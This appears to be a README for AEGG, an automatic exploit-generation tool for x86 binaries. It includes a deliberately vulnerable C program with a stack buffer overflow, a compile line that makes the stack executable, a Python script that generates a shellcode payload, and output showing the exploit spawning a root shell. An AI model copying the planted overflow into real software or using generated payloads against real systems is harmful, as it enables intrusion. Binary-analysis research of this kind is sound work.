AEGG is my simple automatic exploit generation tool. Now only support x86 binary.
- vi
vul.c:#include <stdio.h> #include <unistd.h> #include <string.h> char buf[100]; int sample_func() { char name[10] = {0}; read(0, buf, 307); strcpy(name, buf); printf("input: %s\n", name); } int main(void) { printf("Running...\n"); sample_func(); printf("Done.\n"); } - complie
vul:gcc vul2.c -o vul2 -m32 -g -z execstack - vi
my_aegg.py:from aegg import AEGG binary = './vul' gg = AEGG(binary) # generating payload! gg.hack() print repr(gg.payloads[0].content) gg.save()
$ python my_aegg.py
...
INFO | 2016-06-18 00:10:11,717 | aegg.aegg | Start hacking ...
INFO | 2016-06-17 23:44:43,872 | pwnlib.elf | Stack is executable!
[+] Started program './vul'
INFO | 2016-06-17 23:44:46,974 | pwnlib.tubes.process | Started program './vul'
[*] Stopped program './vul'
INFO | 2016-06-17 23:44:47,976 | pwnlib.tubes.process | Stopped program './vul'
INFO | 2016-06-17 23:44:47,980 | aegg.aegg | Generated!
INFO | 2016-06-17 23:44:47,980 | aegg.aegg | Completed.
$
$ (cat ./vul.exp; cat) | ./vul
Running...
input: jhh///sh/bin��1�j
�̀ÿ @@ @
id
uid=0(root) gid=0(root) groups=0(root)
- angr
- pwntools
-
shellcode (ret2stack)
-
ROP (ret2libc)
-
ROPgadget
-
fmtstr exploit
-
AEGG: inputs in exploit_gen instead of paths (for fuzzing)
-
ret2stack: try every buffer
-
ret2stack: nop-sled
angr-doc/examples/insomnihack_aeg
(State of) The Art of War: Offensive Techniques in Binary Analysis